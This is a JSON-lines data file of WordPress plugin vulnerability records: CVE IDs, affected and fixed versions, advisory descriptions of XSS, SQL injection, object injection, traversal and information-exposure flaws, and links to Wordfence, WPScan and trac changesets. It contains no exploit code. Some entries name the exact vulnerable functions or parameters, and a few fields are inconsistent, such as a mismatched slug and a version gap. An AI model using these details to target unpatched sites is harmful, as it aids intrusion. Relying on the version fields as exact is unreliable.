{"CVE_ID":"CVE-2024-8628","slug":"mailoptin","versionImpact":"1.2.70.3","versionEndExcluding":"1.2.70.4","description":"The Popup, Optin Form & Email Newsletters for Mailchimp, HubSpot, AWeber \u2013 MailOptin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'post-meta' shortcode in all versions up to, and including, 1.2.70.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.70.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d64253b-5803-470d-81ba-d5629406b019?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d64253b-5803-470d-81ba-d5629406b019?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152552\\\/mailoptin\\\/trunk\\\/src\\\/core\\\/src\\\/EmailCampaigns\\\/Shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152552\\\/mailoptin\\\/trunk\\\/src\\\/core\\\/src\\\/EmailCampaigns\\\/Shortcodes.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0842","slug":"backuply","versionImpact":"1.2.6","versionEndExcluding":"1.2.7","description":"The Backuply \u2013 Backup, Restore, Migrate and Clone plugin for WordPress is vulnerable to Denial of Service in all versions up to, and including, 1.2.5. This is due to direct access of the backuply\/restore_ins.php file and. This makes it possible for unauthenticated attackers to make excessive requests that result in the server running out of resources.","recommendation":"Update to version 1.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f955d88-ab4c-4cf4-a23b-91119d412716?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f955d88-ab4c-4cf4-a23b-91119d412716?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3033242\\\/backuply\\\/trunk\\\/restore_ins.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3033242\\\/backuply\\\/trunk\\\/restore_ins.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3870","slug":"contact-form-cfdb7","versionImpact":"1.2.6.8","versionEndExcluding":"1.2.7","description":"The Contact Form 7 Database Addon \u2013 CFDB7 plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 1.2.6.8 via the cfdb7_before_send_mail function. This can allow unauthenticated attackers to extract sensitive data, such as Personally Identifiable Information, from files uploaded by users.","recommendation":"Update to version 1.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/995a6c1d-fb49-4953-9828-f6594ac45fa7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/995a6c1d-fb49-4953-9828-f6594ac45fa7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-cfdb7\\\/trunk\\\/contact-form-cfdb-7.php#L143\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-cfdb7\\\/trunk\\\/contact-form-cfdb-7.php#L143\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3077090\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3077090\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11108","slug":"cryout-serious-slider","versionImpact":"1.2.6","versionEndExcluding":"1.2.7","description":"The Serious Slider WordPress plugin before 1.2.7 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7790af9d-621b-474c-b28c-c774e2a292bb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7790af9d-621b-474c-b28c-c774e2a292bb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-24151","slug":"wp-editor","versionImpact":"1.2.6.3","versionEndExcluding":"1.2.7","description":"The WP Editor WordPress plugin before 1.2.7 did not sanitise or validate its setting fields leading to an authenticated (admin+) blind SQL injection issue via an arbitrary parameter when making a request to save the settings.","recommendation":"Update to version 1.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ee77dd7-5a73-4d4e-8038-23e6e763e20c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ee77dd7-5a73-4d4e-8038-23e6e763e20c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1083","slug":"simple-restrict","versionImpact":"1.2.6","versionEndExcluding":"1.2.7","description":"The Simple Restrict plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.6 via the REST API. This makes it possible for authenticated attackers to bypass the plugin's restrictions to extract post titles and content","recommendation":"Update to version 1.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65963ce0-6589-4753-837c-14ef37a1a9e3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65963ce0-6589-4753-837c-14ef37a1a9e3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3035727%40simple-restrict&new=3035727%40simple-restrict&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3035727%40simple-restrict&new=3035727%40simple-restrict&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0498","slug":"wp-education","versionEndExcluding":"1.2.7","description":"The WP Education WordPress plugin before 1.2.7 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8fa051ad-5b35-46d8-be95-0ac4e73d5eff\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8fa051ad-5b35-46d8-be95-0ac4e73d5eff\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9353","slug":"popularis-extra","versionImpact":"1.2.6","versionEndExcluding":"1.2.7","description":"The Popularis Extra plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.2.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4fc82778-0493-456f-bc73-3d70e3a2b1bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4fc82778-0493-456f-bc73-3d70e3a2b1bf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/popularis-extra\\\/tags\\\/1.2.6\\\/includes\\\/wizard\\\/wizard.php#L305\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/popularis-extra\\\/tags\\\/1.2.6\\\/includes\\\/wizard\\\/wizard.php#L305\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3161466%40popularis-extra&new=3161466%40popularis-extra&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3161466%40popularis-extra&new=3161466%40popularis-extra&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2224","slug":"seo-by-10web","versionEndExcluding":"1.2.7","description":"The SEO by 10Web WordPress plugin before 1.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a76b6d22-1e00-428a-8a04-12162bd0d992\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a76b6d22-1e00-428a-8a04-12162bd0d992\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4347","slug":"wp-fastest-cache","versionImpact":"1.2.6","versionEndExcluding":"1.2.7","description":"The WP Fastest Cache plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.2.6 via the specificDeleteCache function. This makes it possible for authenticated attackers to delete arbitrary files on the server, which can include wp-config.php files of the affected site or other sites in a shared hosting environment.","recommendation":"Update to version 1.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/634d4062-7004-4e89-89a8-323c939aae93?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/634d4062-7004-4e89-89a8-323c939aae93?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php#L1342\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php#L1342\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3089597%40wp-fastest-cache%2Ftrunk&old=3081797%40wp-fastest-cache%2Ftrunk&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3089597%40wp-fastest-cache%2Ftrunk&old=3081797%40wp-fastest-cache%2Ftrunk&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6641","slug":"wp-security-hardening","versionImpact":"1.2.6","versionEndExcluding":"1.2.7","description":"The WP Hardening \u2013 Fix Your WordPress Security plugin for WordPress is vulnerable to Security Feature Bypass in all versions up to, and including, 1.2.6. This is due to use of an incorrect regular expression within the \"Stop User Enumeration\" feature. This makes it possible for unauthenticated attackers to bypass intended security restrictions and expose site usernames.","recommendation":"Update to version 1.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a52a278-1729-4027-8a00-e9804fa6698b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a52a278-1729-4027-8a00-e9804fa6698b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3151308\\\/wp-security-hardening\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3151308\\\/wp-security-hardening\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3501","slug":"formcraft-form-builder","versionEndExcluding":"1.2.7","description":"The FormCraft WordPress plugin before 1.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d3fb4a2b-ed51-4654-b7c1-4b0f59cd1ecf\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d3fb4a2b-ed51-4654-b7c1-4b0f59cd1ecf\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10566","slug":"slider-wd","versionImpact":"1.2.61","versionEndExcluding":"1.2.62","description":"The Slider by 10Web  WordPress plugin before 1.2.62 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.2.62, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a98a7f11-4c01-4b91-8adc-465beefa310a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a98a7f11-4c01-4b91-8adc-465beefa310a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10565","slug":"slider-wd","versionImpact":"1.2.61","versionEndExcluding":"1.2.62","description":"The Slider by 10Web  WordPress plugin before 1.2.62 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.2.62, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4ef05302-a6ca-4816-ab0d-a4e3bf7a5e22\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4ef05302-a6ca-4816-ab0d-a4e3bf7a5e22\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4216","slug":"woo-orders-tracking","versionEndExcluding":"1.2.6","description":"The Orders Tracking for WooCommerce WordPress plugin before 1.2.6 doesn't validate the file_url parameter when importing a CSV file, allowing high privilege users with the manage_woocommerce capability to access any file on the web server via a Traversal attack. The content retrieved is however limited to the first line of the file.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8189afc4-17b3-4696-89e1-731011cb9e2b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8189afc4-17b3-4696-89e1-731011cb9e2b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1287","slug":"pmpro-member-directory","versionEndExcluding":"1.2.6","description":"The pmpro-member-directory WordPress plugin before 1.2.6 does not prevent users with at least the contributor role from leaking other users' sensitive information, including password hashes.","recommendation":"Update to version 1.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/169e5756-4e12-4add-82e9-47471c30f08c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/169e5756-4e12-4add-82e9-47471c30f08c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2166","slug":"cm-faq","versionImpact":"1.2.5","versionEndExcluding":"1.2.6","description":"The CM FAQ  \u2013 Simplify support with an intuitive FAQ management tool plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cm-faq\\\/tags\\\/1.2.4\\\/package\\\/cminds-free.php#L2662\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cm-faq\\\/tags\\\/1.2.4\\\/package\\\/cminds-free.php#L2662\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cm-faq\\\/tags\\\/1.2.5\\\/package\\\/cminds-free.php#L2662\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cm-faq\\\/tags\\\/1.2.5\\\/package\\\/cminds-free.php#L2662\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cm-faq\\\/tags\\\/1.2.6\\\/package\\\/cminds-free.php#L2662\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cm-faq\\\/tags\\\/1.2.6\\\/package\\\/cminds-free.php#L2662\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b8d21cb-fe87-4947-a44b-7d670cf2123e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b8d21cb-fe87-4947-a44b-7d670cf2123e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7656","slug":"devvn-image-hotspot","versionImpact":"1.2.5","versionEndExcluding":"1.2.6","description":"The Image Hotspot by DevVN plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.2.5 via deserialization of untrusted input in the 'devvn_ihotspot_shortcode_func' function. This makes it possible for authenticated attackers, with Author-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/624bdb9e-6c50-4a00-9a04-1a32c938d48b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/624bdb9e-6c50-4a00-9a04-1a32c938d48b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/devvn-image-hotspot\\\/trunk\\\/admin\\\/inc\\\/add_shortcode_devvn_ihotspot.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/devvn-image-hotspot\\\/trunk\\\/admin\\\/inc\\\/add_shortcode_devvn_ihotspot.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139899\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139899\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8739","slug":"wp-recaptcha-integration","versionImpact":"1.2.5","versionEndExcluding":"1.2.6","description":"The ReCaptcha Integration for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77476bad-e9a4-4266-b07e-b402b33cc27a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77476bad-e9a4-4266-b07e-b402b33cc27a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recaptcha-integration\\\/tags\\\/1.3.0\\\/inc\\\/class-wp_recaptcha_options.php#L405\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recaptcha-integration\\\/tags\\\/1.3.0\\\/inc\\\/class-wp_recaptcha_options.php#L405\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recaptcha-integration\\\/tags\\\/1.2.5\\\/inc\\\/class-wp_recaptcha_options.php#L362\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recaptcha-integration\\\/tags\\\/1.2.5\\\/inc\\\/class-wp_recaptcha_options.php#L362\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3176796%40wp-recaptcha-integration&new=3176796%40wp-recaptcha-integration&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3176796%40wp-recaptcha-integration&new=3176796%40wp-recaptcha-integration&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8283","slug":"slider-wd","versionImpact":"1.2.58","versionEndExcluding":"1.2.59","description":"The Slider by 10Web  WordPress plugin before 1.2.59 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.2.59, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a60aed55-c0a2-4912-8844-cdddf31d90b6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a60aed55-c0a2-4912-8844-cdddf31d90b6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6408","slug":"UNKNOWN-CVE-2024-32578-1","versionImpact":"1.2.56","versionEndExcluding":"1.2.57","description":"The Slider by 10Web  WordPress plugin before 1.2.57 does not sanitise and escape its Slider Title, which could allow high privilege users such as editors and above to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 1.2.57, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31aaeffb-a752-4941-9d0f-1b374fbc7abb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31aaeffb-a752-4941-9d0f-1b374fbc7abb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6026","slug":"slider-wd","versionImpact":"1.2.55","versionEndExcluding":"1.2.56","description":"The Slider by 10Web  WordPress plugin before 1.2.56 does not sanitise and escape some of its Slide options, which could allow authenticated users with access to the Sliders (by default Administrator, however this can be changed via the Slider by 10Web  WordPress plugin before 1.2.56's options) and the ability to add images (Editor+) to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 1.2.56, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/01609d84-e9eb-46a9-b2cc-fe7e0c982984\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/01609d84-e9eb-46a9-b2cc-fe7e0c982984\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0963","slug":"calculated-fields-form","versionImpact":"1.2.52","versionEndExcluding":"1.2.53","description":"The Calculated Fields Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's CP_CALCULATED_FIELDS shortcode in all versions up to, and including, 1.2.52 due to insufficient input sanitization and output escaping on user supplied 'location' attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.53, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d870ff8d-ea4b-4777-9892-0d9982182b9f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d870ff8d-ea4b-4777-9892-0d9982182b9f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3029782%40calculated-fields-form&new=3029782%40calculated-fields-form&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3029782%40calculated-fields-form&new=3029782%40calculated-fields-form&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029782\\\/calculated-fields-form\\\/trunk\\\/inc\\\/cpcff_main.inc.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029782\\\/calculated-fields-form\\\/trunk\\\/inc\\\/cpcff_main.inc.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12721","slug":"wb-custom-product-tabs-for-woocommerce","versionImpact":"1.2.4","versionEndExcluding":"1.2.5","description":"The Custom Product Tabs For WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.2.4 via deserialization of untrusted input from the 'wb_custom_tabs' parameter. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wb-custom-product-tabs-for-woocommerce\\\/trunk\\\/includes\\\/class-wb-custom-product-tabs-for-woocommerce.php#L366\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wb-custom-product-tabs-for-woocommerce\\\/trunk\\\/includes\\\/class-wb-custom-product-tabs-for-woocommerce.php#L366\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fdc6a04-ef39-498a-b739-f40d5d8af47e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fdc6a04-ef39-498a-b739-f40d5d8af47e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10669","slug":"countdown-time","versionImpact":"1.2.4","versionEndExcluding":"1.2.5","description":"The Countdown Timer block \u2013 Display the event&#039;s date into a timer. plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.4 via the [ctb] shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 1.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24ccc2cb-3c5d-48cd-bc40-2717145b4912?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24ccc2cb-3c5d-48cd-bc40-2717145b4912?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/countdown-time\\\/tags\\\/1.2.4&new_path=\\\/countdown-time\\\/tags\\\/1.2.5&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/countdown-time\\\/tags\\\/1.2.4&new_path=\\\/countdown-time\\\/tags\\\/1.2.5&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10352","slug":"magical-addons-for-elementor","versionImpact":"1.2.4","versionEndExcluding":"1.2.5","description":"The Magical Addons For Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.4 via the get_content_type function in includes\/widgets\/content-reveal.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 1.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8aa2ba7f-c33d-4e80-b1cf-2d7b2a497f04?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8aa2ba7f-c33d-4e80-b1cf-2d7b2a497f04?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182827\\\/magical-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182827\\\/magical-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
